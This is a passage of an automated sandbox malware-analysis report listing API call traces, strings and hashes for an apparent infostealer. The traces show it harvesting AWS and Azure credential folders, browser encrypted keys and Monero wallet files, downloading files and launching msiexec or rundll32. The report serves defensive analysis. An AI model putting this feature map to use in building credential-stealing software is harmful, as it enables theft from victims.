                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: 5e5ba61d40d35f83e3d75ee7a7013c4278daef9e1e2ba9f28dea17d6786428f2
                                • Instruction ID: bb8a93c2477e6991b54d87b897251c5ffbed99ca625da533b34ebe1628517e78
                                • Opcode Fuzzy Hash: 5e5ba61d40d35f83e3d75ee7a7013c4278daef9e1e2ba9f28dea17d6786428f2
                                • Instruction Fuzzy Hash: 7F811CB191011C9BDB28DB94DC95FEAB7B8FF18704F008299E10AE6140DF74AB86CF95
                                APIs
                                  • Part of subcall function 008C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008C8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 008C4DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 008C4DCD
                                  • Part of subcall function 008C4910: wsprintfA.USER32 ref: 008C492C
                                  • Part of subcall function 008C4910: FindFirstFileA.KERNEL32(?,?), ref: 008C4943
                                • lstrcat.KERNEL32(?,00000000), ref: 008C4E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 008C4E59
                                  • Part of subcall function 008C4910: StrCmpCA.SHLWAPI(?,008D0FDC), ref: 008C4971
                                  • Part of subcall function 008C4910: StrCmpCA.SHLWAPI(?,008D0FE0), ref: 008C4987
                                  • Part of subcall function 008C4910: FindNextFileA.KERNEL32(000000FF,?), ref: 008C4B7D
                                  • Part of subcall function 008C4910: FindClose.KERNEL32(000000FF), ref: 008C4B92
                                • lstrcat.KERNEL32(?,00000000), ref: 008C4EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 008C4EE5
                                  • Part of subcall function 008C4910: wsprintfA.USER32 ref: 008C49B0
                                  • Part of subcall function 008C4910: StrCmpCA.SHLWAPI(?,008D08D2), ref: 008C49C5
                                  • Part of subcall function 008C4910: wsprintfA.USER32 ref: 008C49E2
                                  • Part of subcall function 008C4910: PathMatchSpecA.SHLWAPI(?,?), ref: 008C4A1E
                                  • Part of subcall function 008C4910: lstrcat.KERNEL32(?,007BE130), ref: 008C4A4A
                                  • Part of subcall function 008C4910: lstrcat.KERNEL32(?,008D0FF8), ref: 008C4A5C
                                  • Part of subcall function 008C4910: lstrcat.KERNEL32(?,?), ref: 008C4A70
                                  • Part of subcall function 008C4910: lstrcat.KERNEL32(?,008D0FFC), ref: 008C4A82
                                  • Part of subcall function 008C4910: lstrcat.KERNEL32(?,?), ref: 008C4A96
                                  • Part of subcall function 008C4910: CopyFileA.KERNEL32(?,?,00000001), ref: 008C4AAC
                                  • Part of subcall function 008C4910: DeleteFileA.KERNEL32(?), ref: 008C4B31
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: 5f427ca85ce5f2227618ba26d4b5fcdfe2ff6ca6eb366addb162c81001691ab3
                                • Instruction ID: 7040271a2d23092304bf9cd5a44cee26f77c72a47c5db27269c5d5be02fcec35
                                • Opcode Fuzzy Hash: 5f427ca85ce5f2227618ba26d4b5fcdfe2ff6ca6eb366addb162c81001691ab3
                                • Instruction Fuzzy Hash: 1D4183B994021867CB14F7A0EC97FE93738FB24744F404558B149D62C1EEB49BC98B93
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 008C906C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: 67184aa814f6f0de5b7b5af360b9884bad425f2b70d6b5706a4ea6ce54cf9d73
                                • Instruction ID: 1069c4ad24a1ecd0f6e915dbe842a80a8845386310926cd5a17089db7d8f27d5
                                • Opcode Fuzzy Hash: 67184aa814f6f0de5b7b5af360b9884bad425f2b70d6b5706a4ea6ce54cf9d73
                                • Instruction Fuzzy Hash: 0C71CBB1910208ABDB14EBE4DC99FEEB7B8FB58700F108518F559EB290DB74E905CB61
                                APIs
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 008C31C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 008C335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 008C34EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: 0c1626017cdc957ca68148d003ad2c931e2ac34a0eef722ef695848595411d05
                                • Instruction ID: 892d2360721ee4efb8d1ff6b7aa226d29172b804b7dfc6590671a4d3ad9b9923
                                • Opcode Fuzzy Hash: 0c1626017cdc957ca68148d003ad2c931e2ac34a0eef722ef695848595411d05
                                • Instruction Fuzzy Hash: AE12D97181010C9BDB19EBA4DC92FEDB738FF14304F50816DE506A6191EF34AA4ACFA6
                                APIs
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008B6280: InternetOpenA.WININET(008D0DFE,00000001,00000000,00000000,00000000), ref: 008B62E1
                                  • Part of subcall function 008B6280: StrCmpCA.SHLWAPI(?,007BE270), ref: 008B6303
                                  • Part of subcall function 008B6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008B6335
                                  • Part of subcall function 008B6280: HttpOpenRequestA.WININET(00000000,GET,?,007BD9C8,00000000,00000000,00400100,00000000), ref: 008B6385
                                  • Part of subcall function 008B6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008B63BF
                                  • Part of subcall function 008B6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008B63D1
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 008C5318
                                • lstrlen.KERNEL32(00000000), ref: 008C532F
                                  • Part of subcall function 008C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008C8E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 008C5364
                                • lstrlen.KERNEL32(00000000), ref: 008C5383
                                • lstrlen.KERNEL32(00000000), ref: 008C53AE
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: 775a92333bc021c9bdb0668d7974b0970a28289713d02b26858cbb2113e84ba5
                                • Instruction ID: 984abf2343edc297196065db26a2e6ad7557e470b408f59727a6c86c55d66453
                                • Opcode Fuzzy Hash: 775a92333bc021c9bdb0668d7974b0970a28289713d02b26858cbb2113e84ba5
                                • Instruction Fuzzy Hash: 1251977091014C9BDB18FFA8D996FED7779FF50304F504128E40ADA592EF34AA46CAA3
                                APIs
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008B47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 008B4839
                                  • Part of subcall function 008B47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 008B4849
                                • InternetOpenA.WININET(008D0DF7,00000001,00000000,00000000,00000000), ref: 008B610F
                                • StrCmpCA.SHLWAPI(?,007BE270), ref: 008B6147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 008B618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008B61B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 008B61DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 008B620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 008B6249
                                • InternetCloseHandle.WININET(?), ref: 008B6253
                                • InternetCloseHandle.WININET(00000000), ref: 008B6260
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID: p{
                                • API String ID: 2507841554-3914500048
                                • Opcode ID: 9c123ef3fbf5124b326b86a23bdce6ced3bb806173beba89185e684539159f7a
                                • Instruction ID: 8847aac79801926378299db0cb00c15719e99f352e339cb65e67187ec2d23aca
                                • Opcode Fuzzy Hash: 9c123ef3fbf5124b326b86a23bdce6ced3bb806173beba89185e684539159f7a
                                • Instruction Fuzzy Hash: 685131B1940218ABDB24DF94DC45FEE77B8FB44705F108098A609E72C1EB74AA85CF96
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: d03c0dcb82437d35d88597ceaa8b89c87d28979cc8724289ea46b536c529319c
                                • Instruction ID: 5c95493a012cef7895eb9752c61ad947ea0c447a581a93fc0b8554cf07d70301
                                • Opcode Fuzzy Hash: d03c0dcb82437d35d88597ceaa8b89c87d28979cc8724289ea46b536c529319c
                                • Instruction Fuzzy Hash: BBC171B594021D9BCB18EFA4DCC9FEA7778FB64304F00459DE50AA7241DA70EA85CF92
                                APIs
                                  • Part of subcall function 008C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008C8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 008C42EC
                                • lstrcat.KERNEL32(?,007BDF38), ref: 008C430B
                                • lstrcat.KERNEL32(?,?), ref: 008C431F
                                • lstrcat.KERNEL32(?,007BC5B8), ref: 008C4333
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008C8D90: GetFileAttributesA.KERNEL32(00000000,?,008B1B54,?,?,008D564C,?,?,008D0E1F), ref: 008C8D9F
                                  • Part of subcall function 008B9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 008B9D39
                                  • Part of subcall function 008B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008B99EC
                                  • Part of subcall function 008B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008B9A11
                                  • Part of subcall function 008B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008B9A31
                                  • Part of subcall function 008B99C0: ReadFile.KERNEL32(000000FF,?,00000000,008B148F,00000000), ref: 008B9A5A
                                  • Part of subcall function 008B99C0: LocalFree.KERNEL32(008B148F), ref: 008B9A90
                                  • Part of subcall function 008B99C0: CloseHandle.KERNEL32(000000FF), ref: 008B9A9A
                                  • Part of subcall function 008C93C0: GlobalAlloc.KERNEL32(00000000,008C43DD,008C43DD), ref: 008C93D3
                                • StrStrA.SHLWAPI(?,007BDFB0), ref: 008C43F3
                                • GlobalFree.KERNEL32(?), ref: 008C4512
                                  • Part of subcall function 008B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008B4EEE,00000000,00000000), ref: 008B9AEF
                                  • Part of subcall function 008B9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,008B4EEE,00000000,?), ref: 008B9B01
                                  • Part of subcall function 008B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,008B4EEE,00000000,00000000), ref: 008B9B2A
                                  • Part of subcall function 008B9AC0: LocalFree.KERNEL32(?,?,?,?,008B4EEE,00000000,?), ref: 008B9B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 008C44A3
                                • StrCmpCA.SHLWAPI(?,008D08D1), ref: 008C44C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 008C44D2
                                • lstrcat.KERNEL32(00000000,?), ref: 008C44E5
                                • lstrcat.KERNEL32(00000000,008D0FB8), ref: 008C44F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000B0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000C8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000D96000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528709467.0000000000DA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528918343.0000000000DA4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529017756.0000000000F3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1529030782.0000000000F3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: aed9db69cb5ceb8f1fc61a573e4dac07dff30461cbe60bd6d2bcf8c29a976216
                                • Instruction ID: 39bd352c1e116c779b46d24d58a57b939d750519ea14ed893b14d10c51e25828
                                • Opcode Fuzzy Hash: aed9db69cb5ceb8f1fc61a573e4dac07dff30461cbe60bd6d2bcf8c29a976216
                                • Instruction Fuzzy Hash: EE7123B6900208ABCB14EBE4DC99FEE7779FB58300F004598E609D7181DA75DB49CBA2
                                APIs
                                  • Part of subcall function 008B12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008B12B4
                                  • Part of subcall function 008B12A0: RtlAllocateHeap.NTDLL(00000000), ref: 008B12BB
                                  • Part of subcall function 008B12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 008B12D7
                                  • Part of subcall function 008B12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008B12F5
                                  • Part of subcall function 008B12A0: RegCloseKey.ADVAPI32(?), ref: 008B12FF
                                • lstrcat.KERNEL32(?,00000000), ref: 008B134F
                                • lstrlen.KERNEL32(?), ref: 008B135C
                                • lstrcat.KERNEL32(?,.keys), ref: 008B1377
                                  • Part of subcall function 008CA740: lstrcpy.KERNEL32(008D0E17,00000000), ref: 008CA788
                                  • Part of subcall function 008CA9B0: lstrlen.KERNEL32(?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008CA9C5
                                  • Part of subcall function 008CA9B0: lstrcpy.KERNEL32(00000000), ref: 008CAA04
                                  • Part of subcall function 008CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008CAA12
                                  • Part of subcall function 008CA8A0: lstrcpy.KERNEL32(?,008D0E17), ref: 008CA905
                                  • Part of subcall function 008C8B60: GetSystemTime.KERNEL32(008D0E1A,007BCF28,008D05AE,?,?,008B13F9,?,0000001A,008D0E1A,00000000,?,007B88C8,?,\Monero\wallet.keys,008D0E17), ref: 008C8B86
                                  • Part of subcall function 008CA920: lstrcpy.KERNEL32(00000000,?), ref: 008CA972
                                  • Part of subcall function 008CA920: lstrcat.KERNEL32(00000000), ref: 008CA982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 008B1465
                                  • Part of subcall function 008CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008CA7E6
                                  • Part of subcall function 008B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008B99EC
                                  • Part of subcall function 008B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008B9A11
                                  • Part of subcall function 008B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 008B9A31
                                  • Part of subcall function 008B99C0: ReadFile.KERNEL32(000000FF,?,00000000,008B148F,00000000), ref: 008B9A5A
                                  • Part of subcall function 008B99C0: LocalFree.KERNEL32(008B148F), ref: 008B9A90
                                  • Part of subcall function 008B99C0: CloseHandle.KERNEL32(000000FF), ref: 008B9A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 008B14EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1528585509.00000000008B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                • Associated: 00000000.00000002.1528571629.00000000008B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1528585509.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
